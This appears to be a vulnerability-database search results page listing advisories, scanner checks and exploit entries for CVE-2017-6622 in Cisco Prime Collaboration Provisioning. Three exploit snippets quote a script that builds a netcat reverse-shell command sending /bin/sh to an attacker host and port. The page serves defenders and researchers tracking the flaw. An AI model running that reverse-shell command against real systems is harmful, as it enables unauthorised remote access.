Lucene search
K

6 matches found

Saint
Saint
added 2017/10/25 12:0 a.m.65 views

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017 CVE: CVE-2017-6622 BID: 98520 Background The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem Missing security constrain...

10CVSS9.6AI score0.6217EPSS
Exploits5
Packet Storm
Packet Storm
added 2017/09/29 12:0 a.m.48 views

Cisco Prime Collaboration Provisioning Authentication Bypass / Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

10CVSS1AI score0.6217EPSS
Exploits5
0day.today
0day.today
added 2017/09/28 12:0 a.m.48 views

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution Exp

Exploit for hardware platform in category remote exploits Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat...

10CVSS9.2AI score0.6217EPSS
Exploits5
Exploit DB
Exploit DB
added 2017/09/27 12:0 a.m.47 views

Cisco Prime Collaboration Provisioning &lt; 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

7.4AI score
Exploits0
Check Point Advisories
Check Point Advisories
added 2017/07/20 12:0 a.m.7 views

Cisco Prime Collaboration Provisioning ScriptMgr Authentication Bypass (CVE-2017-6622)

An authentication bypass vulnerability has been reported in Cisco Prime Collaboration Provisioning. The vulnerability is due to insufficient validation on user supplied paths when a request is sent to ScriptMgr servlet. A remote, unauthenticated attacker can exploit this vulnerability by sending ...

10CVSS2.3AI score0.6217EPSS
Exploits5
Tenable Nessus
Tenable Nessus
added 2017/07/13 12:0 a.m.58 views

Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE

The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands...

10CVSS8.7AI score0.6217EPSS
Exploits5References3
Rows per page
Query Builder